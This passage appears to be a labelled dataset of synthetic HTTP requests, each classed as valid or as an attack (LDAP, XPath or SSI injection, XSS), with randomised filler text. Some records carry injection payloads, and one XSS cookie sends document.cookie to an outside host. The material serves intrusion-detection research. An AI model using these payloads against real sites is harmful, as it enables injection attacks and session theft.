Transfer-Encoding: deflate
Upgrade: xAwDhi/6.3, egwu/9.7
Warning: 242 www.aseaogr.html "nerangaikenWialAe" 
X-Forwarded-For: 221.57.39.147
X-Serial-Number: 08617413458171074212
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13639
Start - Id: 21826
class: Valid
GET /f.-PffRget-Z@X8jm./3rk/ezUeh/ithfrar/uThcrcSat/ce/El6hsenwTarktad/rck8_iFhlvOE68@@r9/t3zWtmjxVm73/sy/i8.jsp?5Ndz=eszfio&or=659&sakwohrcat2naat=%3Anof&tp=70734&eaEt=917&stoleto0=obdsixhrsbuazk&e8l=8weYana+D%2Fktee&59Laeope6=eiteteawp-noog&aF9r-5=89670724&n6ayz=84&eiudih=c7b&y-io.=lihainsert%26N3m2servicesvlgdee%26%40s HTTP/1.0
Host: 210.231.66.141
Connection: close
Accept: application/zip;q=0.5
Accept-Charset: x-mac-japanese, iso-2022-kr
Accept-Encoding: compress;q=0.8, gzip;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 118.8.13.53
Cookie: Shee=IzruTTh;o52mwlruca=tFhCFV;mT5KZlocationpyjTZ=2811
Cookie2: $Version="94"
Date: Sun, 29 Mar 09 01:43:35 GMT
ETag: W/"R5lCvqAM8NjhhWf0sjS"
Expect: 100-continue
From: eZ4Hroh@tl1ethO.ch
If-Modified-Since: Tue, 03 Nov 09 22:03:32 CET
If-Unmodified-Since: Tue, 04 Nov 08 02:13:57 UTC
If-Match: "2Ly33Yd3R_tfEOJDJYdT"
If-None-Match: "lApJA5xVfjZ3gu_2o"
If-Range: Fri, 01 Oct 04 01:05:09 GMT
Max-Forwards: 9
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: 4z9er vahih=tey9oe
Range: 728147-66,8714-380,41-
Referer: /AeUi2iok/rl7gsE8w/mbrsl.mpg
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: sOtoebth0k/6.3.3.4
UA-CPU: Sparc
UA-Disp: 488,0035,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 832x645
Via: FTP/5.1 www.kNeI.css
Transfer-Encoding: identity
Upgrade: odPV/9.4, lhi/7.8, ads/8.6, gll3/8.2
Warning: 052 www.rdtt1ah.js "6g169" 
X-Forwarded-For: 2.146.155.140
X-Serial-Number: 328079
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21826
Start - Id: 38285
class: LdapInjection
GET /SpY/aneuhcswtHqc/t@hsy-G/JdYbiU@8BL/h_a5npmY529jqJLEv7s/ssd.php4?eimthh0p56opab=aebr2%29%28%26%28objectClass+++%3D++cem*%29&ohamu7uahr=4saokd9tfioncrenzN&shieubo=2l HTTP/1.1
Host: 182.158.147.10
Connection: close
Accept: text/*, video/mpeg;q=0.3, image/png;q=0.6
Accept-Charset: iso-8859-8-i
Accept-Encoding: identity
Accept-Language: qscri9bs-e, hea-a9ur4Ery;q=0.6, be-pR5c
Cache-Control: max-stale
Client-ip: 28.240.67.92
Cookie: ghysawinmg=7;roC2om-7mBn.=6xGUa;illHaiduyhyamat=t?ri;ok5ro1t7esGv=8nE;a0yAd=hbij0e0ew7Oe7rsiap
Cookie2: $Version="09"
Date: Sat, 27 Sep 08 15:42:52 UTC
ETag: W/"Bq3JVGm2RGFCrlvj"
Expect: 100-continue
From: deosTn4@ntarwtzGa.ch
If-Modified-Since: Fri, 04 Apr 08 05:16:45 GMT
If-Unmodified-Since: Wed, 30 Jul 08 21:12:25 CET
If-Match: *
If-None-Match: "6-q2N90f9zcQjfY"
If-Range: *
Max-Forwards: 941
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="mscm"
Authorization: giVs8 eeKeyt=oedhece
Range: 339-28315
Referer: /ii17i9/idNm.css
TE: deflate,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: oycBcK http://www.nian.ch
UA-CPU: MIPS
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: 5.1 96.74.31.247, 6.3 www.OYhmh.js, 2.2 www.Fwenpd.html
Transfer-Encoding: deflate
Upgrade: segoo/3.8
Warning: 319 133.132.138.49 "aLcsnAauiahn" 
X-Forwarded-For: 192.211.108.16
X-Serial-Number: 055236562928
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38285
Start - Id: 48252
class: XSS
POST /KtLkO4MYtTuxrr/8srIlso/iNpL1L/iysaErhT/nxWZAJeILbZVkntD.msf? HTTP/1.0
Content-Length: 24
Content-Language: eedcf
Content-Encoding: gzip
Content-Location: /Ine2eS/ica0ct9/lm0wrsn/roanh4t.tiff
Content-MD5: ZWpvcnVzc3hldzB0c2k1Rw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Sep 07 02:31:36 UTC
Last-Modified: Sun, 28 Jan 07 23:25:59 UTC
Host: www.Eradac.cz:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-7, koi8, utf-8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=3115
Client-ip: 182.187.98.155
Cookie: Ptlhen=exystyle2n ecattoea;ocu7K51QTT=2poAeoaonfanNmmr;Nq5te=<meta   http-equiv  =  "    refresh   "    content   =    "     0;url=javascript:   [document.location.replace   ('http://www.itreveit.com/cgi-bin/olmaic.cgi'+document.cookie);]  "   >;D9_phpMcK2E=2332132
Cookie2: $Version="73"
Date: Sat, 07 Nov 09 17:21:21 CET
ETag: "Jo0igLb91S4Lz2_Qklve"
Expect: 100-continue
From: eehan@8noom.gov
If-Modified-Since: Fri, 25 May 07 24:29:28 UTC
If-Unmodified-Since: Thu, 25 Aug 05 19:51:08 GMT
If-Match: "oldRamEP7PmWV5d"
If-None-Match: *
If-Range: Tue, 22 Feb 05 14:39:25 CET
Max-Forwards: 492
MIME-Version: 3.0
Pragma: i=htwqw8
Proxy-Authorization: NTLM ZUllc2VkZWhiY2l3MG40c09IdGhhaGVzNnlIYW1pNm85cmRhaWtu
Authorization: pthi nnai4l=Honcoon
Range: 1099-42048,18-50962
Referer: /aefd0.sh
TE: trailers,gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.0 (X11; U; Linux i586 5.7; en-gs; rv:4.4.3) Gecko/77255386
UA-CPU: 68000
UA-Disp: 344,654,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9341x017
Via: 4.4 0.153.135.105, HTTP/0.2 178.10.248.172:61413
Transfer-Encoding: identity
Upgrade: anpU/1.3, qtqiol/8.7, eiaeO/6.1
Warning: 342 173.97.45.171 "uivI8e2ePc" "Sat, 10 Mar 07 19:18:29 GMT"
X-Forwarded-For: 233.95.8.172
X-Serial-Number: 50764903670932
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

liih=0489&erii=e0gzTIhxi

End - Id: 48252
Start - Id: 844
class: Valid
GET /hicSnesil1peDauhmei/hlae2ot/ds/ttShenNy/mlM/aed2se/tKKz.jpg?l1nrornen3wey5=tmp HTTP/1.1
Host: www.eleI.it
Connection: rs7t6efd
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: lmtrde-rer;q=0.4
Cache-Control: only-if-cached
Client-ip: 183.244.127.135
Cookie: 0RUY=tmefrom;euo=288561981;ycshte42yh=tl5fromW;ZtautoexecrLMgAnh9=ipr%uuaei;6myiAq=oeeif
Cookie2: $Version="42"
Date: Fri, 19 Mar 04 04:47:02 GMT
ETag: "@kve1qUdLGZFJs8I"
Expect: 100-continue
From: envhv@ba7pe.biz
If-Modified-Since: Sat, 22 Oct 05 24:19:29 GMT
If-Unmodified-Since: Sat, 12 Aug 06 17:14:03 UTC
If-Match: "2-NhHg2tL7gHJYvw"
If-None-Match: "y55f75mDKJEHKNj"
If-Range: "qgXIa.ycvhAFbtiQ"
Max-Forwards: 0086
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: sn9E aMqktn=tie3y
Authorization: 3scw pM4ircEt=sr1eLamt
Range: 3484-7556,308859-,59480-133604
Referer: /slyws/emhwa1/Tib5tasm.jpeg
TE: gzip;q=0.5,trailers,trailers
Trailer: TE
User-Agent: Mozilla/6.3 (X11; U; Linux i586 2.7; r2-ct; rv:1.4.4) Gecko/63009368
UA-CPU: x86
UA-Disp: 1089,2350,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 130x106
Via: HTTP/0.2 www.ietni.png, HTTP/4.1 www.csa8t.gif:05, HTTP/6.3 www.orpaixti.jpg
Transfer-Encoding: deflate
Upgrade: ilos8/9.8, esd/4.0, qkt0te/1.0, rr4fN/4.6, Hu9cs/3.0
Warning: 143 157.105.202.150 "sEsibsATArcahcgbo" "Fri, 23 Jun 06 19:18:43 UTC"
X-Forwarded-For: 183.29.19.247
X-Serial-Number: 510626783025324042
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 844
Start - Id: 3687
class: Valid
GET /rPdywSHED6H4VsS2l/vafr6.php?smht=fN%5Ctzhhf8e&p8lke=dbla8va5N&gCextounev=91708&4wgetisRIps=nfprg&tearsnBhsgrepe=3580812466&xo=mochas&qtt=iv&qeuziaAhcQpa=adrop-aeeSi+%7ER+8hv%40rtz&dRI4olosrg2r=0721&mkosnDv=77&wXIy1LBlibFQI=Maso%7Escbs3i HTTP/1.0
Host: www.llsr.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.1, compress, identity;q=0.9
Accept-Language: Teimpco-h, laEt-9rt0m, 1oaaa-ugm, Lh-cs;q=0.2, am-ohN9r
Cache-Control: no-cache
Client-ip: 243.250.130.40
Cookie: dRt2ft=5877;AaddttNneemxhMn=OsEnb(v$rnduanoseah;noAe=iU0LP@Kgn;maifiseLrj=iamnhrGg7
Cookie2: $Version="8"
Date: Thu, 07 Jul 05 23:36:27 UTC
ETag: W/"tYocNHVY96Z_wzgnl"
Expect: s45e
From: msqr@3sAneh.gov
If-Modified-Since: Sun, 01 May 05 04:25:19 CET
If-Unmodified-Since: Wed, 28 Dec 05 13:31:44 CET
If-Match: "@o9TDaNjYtumz8JAx"
If-None-Match: "klrSX8PR@6GBHrR"
If-Range: "7TONY14QovMbfS6gIv_i"
Max-Forwards: 178
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: 2nsn hBbdTAE=enci
Authorization: NTLM ZWVhOW5uZTRlbmdhRnNsbzlzbmVuMTFodGlub2FoYWFhaWV0
Referer: /itabece4/rshdsh/oasee.zip
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.6 (X11; U; Linux i386 5.6; mo-7x; rv:8.9.2) Gecko/13338152
UA-Disp: 7385,2023,32
UA-OS: Mac OS X
Via: 5.4 214.241.104.98, 8.9 www.lde9zRn.tiff
Transfer-Encoding: deflate
Upgrade: eaie/1.7, anl/6.3, trse/1.3, nohe/7.8, pis/8.8
Warning: 881 204.8.105.138 "5ptueh5" 
X-Forwarded-For: 244.94.150.34
----: -----------------

null

End - Id: 3687
Start - Id: 38099
class: LdapInjection
GET /hPgR5QT.2tMTI4XYx/yyrLOs/tamrkiHuesnrtttieaa/sTG2ZL5G@v5/sWX1Ez0ThFxcg242Ro/Ohm5ciueiedIfne1a/aRShqSOCO6-UNOXoPqMS.js?imr2l=%29+%28+%7C++%285VavY%3Dq0H3c*%29&o8r0coheei7se=019514 HTTP/1.1
Host: www.9ttme9.it
Connection: 9fqeyo
Accept: audio/*;q=0.4, video/*;q=0.1
Accept-Charset: isiri-3342, windows-1254;q=0.8, euc-tw, windows-1258;q=0.9, windows-1257;q=0.9
Accept-Encoding: compress;q=0.2
Accept-Language: *;q=0.9
Cache-Control: min-fresh=72
Client-ip: 80.51.6.160
Cookie: 3yy8=- c
Cookie2: $Version="433"
Date: Sun, 25 Mar 07 03:50:59 GMT
ETag: ".@oOa6lHm-n1XKovek"
Expect: yzytf=wi36hMoe
From: ehldyeiL@ertsuha.st
If-Modified-Since: Fri, 27 Feb 04 09:09:17 GMT
If-Unmodified-Since: Fri, 26 Aug 05 13:34:26 CET
If-Match: *
If-None-Match: "7uUEgZHOE@Xa-@h6r"
If-Range: Tue, 03 Apr 07 05:46:09 GMT
Max-Forwards: 377
MIME-Version: 1.3
Pragma: Tcj=rt
Proxy-Authorization: atswre uFty=o9ssf
Authorization: NTLM ZWNvdTYwM3llMzlhdEw5cm56Z3dvbWlnTnJlb09naTlpbG01VFlj
Range: -26705,8389-9530,6-32
Referer: http://teeorf.com/cYei/aeirfGin/z6fv.fgf
TE: chunked,deflate;q=0.7,trailers
Trailer: Trailer
User-Agent: cc8qQVpVf http://www.saNseIR.it
UA-CPU: 68000
UA-Disp: 6214,984,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: 6.8 177.60.252.111, 4.2 www.arrzt.css:8512, 5.0 241.22.114.3:419
Transfer-Encoding: deflate
Upgrade: ttyt/8.2, cspny/5.6, dpX8/2.9
Warning: 611 99.132.169.142 "aehcm" 
X-Forwarded-For: 42.181.165.201
X-Serial-Number: 2885123328233620
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38099
Start - Id: 32908
class: Valid
POST /iSLuWlM0YlAe55bsE/a2PfGYjV4vt-OM9H/tkclkHeNpTPF.j/0srlxy-qlFuH/TpweeE/TysfeaNntab/fsxpeoRLosteEoztl/ltYtat5zTsi0az.css? HTTP/1.0
Content-Length: 133
Content-Language: mNt0
Content-Encoding: deflate
Content-Location: /tgaolAs/ohttddid.jpeg
Content-MD5: ZTl0bEF4ZXdlaGNlbm5vOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Oct 07 08:15:02 UTC
Last-Modified: Fri, 04 Aug 06 02:57:24 UTC
Host: www.votis.cz:45773
Connection: 9eneh
Accept: audio/*;q=0.7
Accept-Charset: windows-1257;q=0.2, iso-10646-ucs-2, utf-8
Accept-Encoding: *;q=0.6
Accept-Language: hcuvaRj-a;q=0.8, na-d8u, sTleft-leMo, ik-uuetitl
Cache-Control: no-store
Client-ip: 80.69.27.122
Cookie: nss6reihmE=hhtiaemdct;hdq3=4286;vglkm= lrilibSconnectslikeihautoexec(q[ie;scriptR-@=90805;gciettondket=38509403
Cookie2: $Version="066"
Date: Fri, 19 Jan 07 08:48:07 GMT
ETag: "WQhf2-lcMU2nJGjaJ"
Expect: 100-continue
From: Qtafer@rrotHx.be
If-Modified-Since: Sat, 03 May 08 18:27:25 CET
If-Unmodified-Since: Wed, 23 Jan 08 06:57:42 UTC
If-Match: *
If-None-Match: "64Zb2VCAZO@ugYAl8dOb"
If-Range: "vE7PW8DvIOP.Znu_CzE"
Max-Forwards: 78
MIME-Version: 7.9
Pragma: h9='Picty'
Proxy-Authorization: Digest cnonce="oiAtpy"
Authorization: rovb eete=ocorab59
Range: 28-
Referer: http://r4et.be/euiu9l1d/hqnu/rsmw4he/rjhenh9/rdis.png
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/9.0 (Windows; U; Win 9x 1.4; tm-ld; rv:2.7.3) Gecko/96144931
UA-CPU: 68000
UA-Disp: 523,5412,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 329x9212
Via: FTP/1.7 8.217.147.57, 8.7 36.184.139.103
Transfer-Encoding: deflate
Upgrade: Eimea/2.3, soetb/6.4, huyi/1.7, tElne/4.6
Warning: 988 www.ietii.tiff "thtefthTReTd" "Fri, 09 Nov 07 08:45:51 UTC"
X-Forwarded-For: 96.92.231.105
X-Serial-Number: 9424795318731679930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Gaov=culsasesosectnanj&cNr=9+e&Frcpperl3vUH9=igyese4wtrs1ua&L8QolocationZ=4660&sadro=xnnum&aamao=fps<a4tnmscriptnI%D&eseeG=2102

End - Id: 32908
Start - Id: 31274
class: Valid
GET /vmawS2II1qka/oSh/w608Tftpm/rujUrhh/CXKiltmp/rZc7qs3v5F.BO/er@Til87m-co/ixejjBHJL3xmM@Y/vnerfa/l5uewlpfntmtSese/sWUiVSRT/LinsertAHselectqEfHngM.dll?py_I2GRp=1157&66Y4DB7HIyjL=28&.nOX1I=848&3V5hq=rcs%3E&eEyiiolt=3359&e-Y6rBGexecS@Ow=7shksWot&ce7exT51doutAo=vae9ropr40hymQnot&miscureo=2799738&acon5Soseltt=5789 HTTP/1.1
Host: 186.49.60.193
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: eovk3w-yep9i8as, ee7gyna-ktLo, ab-mrpseasb
Cache-Control: max-stale=1824
Client-ip: 200.93.24.149
Cookie: cs35etz=6;pldcC=R0
Cookie2: $Version="0"
Date: Thu, 19 Apr 07 03:40:24 UTC
ETag: W/"6QGkVgbPM@bx-ExsL"
Expect: qddeh=sdiabmt;loHserrr
From: nio77o3@cuat.be
If-Modified-Since: Mon, 02 Aug 04 22:18:19 GMT
If-Unmodified-Since: Sun, 17 Apr 05 07:41:36 GMT
If-Match: *
If-None-Match: "zaY0Tpaf0g7pSmM"
If-Range: Mon, 12 Mar 07 11:10:58 GMT
Max-Forwards: 173
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: Atoysb ohobdc=ekNs7h
Range: 019-,893-4434
Referer: http://prDaec.cz/erNo5ay.sh
TE: trailers
Trailer: TE
User-Agent: Mozilla/7.3 (X11; U; Linux i386 2.3; eI-sa; rv:7.6.3) Gecko/73528494
UA-CPU: 68000
UA-Disp: 5325,2370,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3795x126
Via: HTTP/6.3 75.23.57.15:241, FTP/9.5 113.170.91.4, HTTP/1.2 39.180.95.118
Transfer-Encoding: gzip
Upgrade: lwn/6.9
Warning: 691 www.OGbt0T.css "udswuftuhm" 
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 173088240
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31274
Start - Id: 39412
class: SSI
GET /6ahbaihrlybsEecdkhsd.cfm?ise=d5edlsmhis&i5=o8hoax&ciegh3ewsuwz=udi50iafromexeceg&1ream6nntot=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.1
Host: 45.59.134.194
Connection: lbea
Accept: image/png
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.9
Cache-Control: max-stale=71
Client-ip: 123.202.136.228
Cookie: eqdehisgofsmhn=6059;uttrirtts3aeg=15483110
Cookie2: $Version="9"
Date: Mon, 20 Dec 04 24:52:44 UTC
ETag: "gFaCTXTMM3uIhv8kx"
Expect: 100-continue
If-Modified-Since: Sun, 10 Feb 08 17:51:02 UTC
If-Unmodified-Since: Wed, 22 Feb 06 23:18:52 UTC
If-Match: *
If-None-Match: "1IrQSi9B47IhbBb"
If-Range: Tue, 06 Apr 10 04:58:08 UTC
Max-Forwards: 3
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic bG1uZWg3cDI6eXRkR3M=
Authorization: Basic c2kyQjpnb3Zp
Range: 747370-38132,5734-
Referer: /tabucahs/rhkr/rleosi/nabtpeO.asmx
TE: gzip,trailers
Trailer: Via
User-Agent: wAAv.Ql2E http://www.gutwro0i.it
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-Color: color8
UA-Pixels: 4162x972
Via: ttk/1.9 www.snciFds.js, HTTP/0.9 10.224.148.192, qsyf/2.3 199.247.41.220
Transfer-Encoding: gzip
X-Serial-Number: 3653526354532
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39412
Start - Id: 35756
class: XPathInjection
GET /tmnivweelbTnou3A/uQfgCYov2y-OQe.z@K/qvvWq/zTwro8l/qG1bCpZ1iQ7.shtml?eaeygu=7o4ed8%2FcitL%2Flhicas%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D9%5D++or+++%27bu6etm%27+%3D+++%27&qii3rrmf7=oOeo%26lrN+vEwindow.openaehto&Eri4sLzhcumfRy=pjaenSRy4G3&4anqwn3=cfJWExfNj&CLort=aan%2Fe+zuscriptNhn&Cnal2tS5ldmn=pscate&hAoptL=iwtwsl&rcWdhirc=end+usrhtaccesqaa HTTP/1.1
Host: www.niti8i.it
Connection: keep-alive
Accept: text/*;q=0.7
Accept-Charset: x-mac-cyrillic;q=0.5, euc-cn;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 54.55.177.74
Cookie: imh6yeYte=c2qtis\id;63xterm.vC=Se;raaAusrleltr\g;5PkSunionlibI=childsgbtq;s3At0labodtr3=aFrc7ratne;tTN=87759
Cookie2: $Version="034"
Date: Tue, 24 Aug 04 17:09:06 GMT
ETag: W/"93dO5EHm@7LqEQZd"
Expect: ir13aesi=oye3fea;4ez86tn=EcuoTpy
From: nsEeee@gxtagow.be
If-Modified-Since: Fri, 21 Dec 07 21:47:20 GMT
If-Unmodified-Since: Tue, 20 Jan 09 17:04:50 CET
If-Match: "Rqk.CsPwaBTeNP_0"
If-None-Match: *
If-Range: Sun, 31 Jan 10 03:35:40 UTC
Max-Forwards: 7
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: Digest username="ectz2a"
Range: 912919-0,159182-1735
Referer: http://www.a20huog.com/Woiasli/DiD39/7lrI/beafeAhf/Ecprnt.asmx
TE: trailers,chunked
Trailer: Connection
User-Agent: tuUid/6.9
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 6100x360
Via: 4.5 248.40.106.232, FTP/6.0 111.241.222.252, 8.4 99.239.16.16
Transfer-Encoding: compress
Upgrade: Toa/4.1
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 040193563593
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35756
Start - Id: 33736
class: Valid
PUT /yb/etPUPpQ2s_gDU-U5NxCZ/jiui8ovhnp2evr/iGIlRD8e4-gNL/vheleyrh8eorecevi/aSq/LS-bp6/M0Cincludey82eRb5/aIo4uo1j1acoeaeau/FNL/o4vbt/sblSrc4on.php4? HTTP/1.0
Content-Length: 89
Content-Language: rr
Content-Encoding: compress
Content-Location: http://www.qosetda.de/rn8a/aiolao/iawtspo/etcth/8rsny.txt
Content-MD5: aVNjemhuZWVpbmlsZFVBYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Sep 04 09:30:38 UTC
Last-Modified: Sun, 05 Feb 06 22:53:23 GMT
Host: 64.96.31.95
Connection: close
Accept: application/x-tar, text/plain, application/*;q=0.7
Accept-Charset: windows-874
Accept-Encoding: 
Accept-Language: dg2bhDpi-nd
Cache-Control: min-fresh=95441
Client-ip: 47.121.242.116
Cookie: 4Wtdettsnecnh8=n9ehdhx;6vlwileoeseto7e=laa|dhn5ly;oxcg8oesiq=0198586365
Cookie2: $Version="1"
Date: Fri, 22 Jun 07 08:03:48 GMT
ETag: "yolOJU8c1LNC3S59k"
Expect: 100-continue
From: eSwnhmt9@baaeh4uleA.net
If-Modified-Since: Fri, 04 Jun 04 02:13:27 UTC
If-Unmodified-Since: Sat, 11 Jun 05 20:07:01 CET
If-Match: ".qdAMsjuvo_H-hD-hT"
If-None-Match: "WCVLaKI3oHCXNO.Qm"
If-Range: "o7mIhcC-FiPTrkYrl5xv"
Max-Forwards: 76
MIME-Version: 5.8
Pragma: yn=6lOct0ao
Proxy-Authorization: NTLM OVN2RW51NGhhYjd5U3BjUGU2cGFhZ2FEbGl5bzJlc251cjVp
Authorization: bgLr eb9Eol=jtiJeb7
Range: -52
Referer: http://www.ttuDc.ch/bfte1wi/xrhP/eta2ste/E2tT/Iue0.wav
TE: trailers,trailers,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: mnHFTrc http://www.vevueE9s.com
UA-CPU: StrongARM
UA-Disp: 759,118,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 520x205
Via: rioil/9.1 www.hc3pwea.js
Transfer-Encoding: deflate
Upgrade: Xccd/0.2, esdaz/5.3
Warning: 146 www.heyaohc7.png "iqTeaiaieCen" "Thu, 28 May 09 11:14:53 UTC"
X-Forwarded-For: 109.249.70.237
X-Serial-Number: 695598853636
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

teN=eninpgtmhwytqrcu&n2iKre5TlC=4&pxkoRqDined=sH7LQkwe5uT&as@netcatIS@HScLW=zlcjsQuhaoptc

End - Id: 33736
Start - Id: 1552
class: Valid
GET /isane/nsfa8watIzHbAgri/4erNlnzutfgete/tmeltraoea7scj/tCwrIajb8MaFhC/eeeeonospyvk8Reegess/C4/K5HLXunionJpaAJ/cjhWAu_pyFzST_xXIK/fl0m/gyhgeaceHnwzo.jpg?sach=tdyAopenes5%40au+%3Ft4roi&eseo5noaoni=6404471&7ginesetp=4490668&fGXdZ8wol=800316629&teathHhcehioot9=2267&ne9=9&Eoyaw9ntdigj=9238127&ybo=6&KQ@BODibCeEL=05209414&Cgno=a+ HTTP/1.1
Host: 77.113.251.240:27197
Connection: close
Accept: audio/x-wav;q=0.9, image/*;q=0.3, text/xml
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, gzip
Accept-Language: *
Cache-Control: max-age=137
Client-ip: 139.146.235.78
Cookie: tyseb=1336
Cookie2: $Version="374"
Date: Wed, 17 Feb 10 01:08:43 GMT
ETag: "PjSX4lqqUOqurFvPs4P"
Expect: meYira=tis4mexm;eieUm
From: uared@sesbwap.com
If-Modified-Since: Sat, 27 Aug 05 09:57:07 UTC
If-Unmodified-Since: Mon, 27 Apr 09 22:24:11 CET
If-Match: "yYL5moBLjvnmz0eh"
If-None-Match: *
If-Range: "z1X_9slu1Ebw24NvaWa"
Max-Forwards: 0210
MIME-Version: 8.2
Pragma: ott=sstjt
Proxy-Authorization: Basic OGRhc3J0Y3Q6UmVlVHk=
Authorization: yoT7 bseO=fana
Range: -6,-03,-014
Referer: /tNueene/toddTto/moa3e/nSzt3i6/tRehV.jsp
TE: trailers
Trailer: Accept-Charset
User-Agent: peoSytuwj (8wjRMuijw; rW1_eoj1r; w_H84uvGj4)
UA-CPU: StrongARM
UA-Disp: 048,2159,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7934x8697
Via: 9.4 www.onennt7.js
Transfer-Encoding: ftnba
Upgrade: ameA/9.9, rzoIer/1.8, llO2/3.9, Oyt/1.5
Warning: 172 www.gicpsf4l.css "oo512" "Thu, 06 Jul 06 16:00:23 UTC"
X-Forwarded-For: 223.124.189.8
X-Serial-Number: 2858071636366715430
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1552
Start - Id: 49978
class: XPathInjection
GET /ycanrbale0kbtoileR/orneeFrkyq/LaredsbrgtsK6ew/c5WI0k/rnr0kzrni3ra/8a1esNh/GrreIhenjof.jpg?C-9GLX-aGlinclude=oyA_&lfiuhg=44025057&exmEheEdSogcTie=2nr%27++++or+6++%3C+count%28path%2Fchild%3A%3A*%29+or++++%27nqNxcPe%27+++%3D++%27&Nu3n=srq3+%3Bt&re2n3klodsBetcf=7947225609&sk=dZU9P6b.Cktx&dal65rdco=65940&zrn=esl9roo HTTP/1.0
Host: 152.134.114.161:96
Connection: ilrmpos
Accept: audio/*, image/jpeg;q=0.8, application/zip
Accept-Charset: big5;q=0.5, iso-10646-ucs-2, x-mac-korean, x-mac-turkish;q=0.7, iso-8859-3
Accept-Encoding: deflate;q=0.2
Accept-Language: ie-s0s;q=0.0, atTse-hdat;q=0.5, egdt-TZ9Oehre
Cache-Control: max-age=8
Client-ip: 156.223.154.24
Cookie2: $Version="372"
Date: Sun, 22 Jun 08 16:10:14 UTC
ETag: W/"j_9d8nENb2Gi6G5"
Expect: etuerprO
From: aihryej@wvtazei.be
If-Modified-Since: Fri, 06 Oct 06 02:54:24 CET
If-Unmodified-Since: Sat, 30 Jan 10 19:54:00 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Mar 07 14:25:03 UTC
Max-Forwards: 82
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest response="CC5E7EdEafE81B3DBCeA5a5BbFE19b80"
Authorization: Digest nonce
Range: 30900-
Referer: /issit0/8AGI/nsmeRhn/lsewq/a9h4mrra.sh
TE: trailers,trailers
Trailer: If-Match
User-Agent: hnhz (usb_RAu8Ni; aN@3cLpgl; oFmVBp)
UA-CPU: 68000
UA-Disp: 229,130,32
UA-OS: Linux
Via: 9xss/2.8 www.eteYr.png, evto/4.1 www.nqdee.jpg
Transfer-Encoding: identity
Warning: 373 www.dycegetI.js "ud0n" "Sun, 04 May 08 18:18:10 CET"
X-Forwarded-For: 10.220.189.114
X-Serial-Number: 6790519632
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49978
Start - Id: 8782
class: Valid
GET /cRMq@P_n/hoRiaf/t6ereaYa/sB5E4ajoleljauese/uRFWBf7h/@w6XB.html? HTTP/1.1
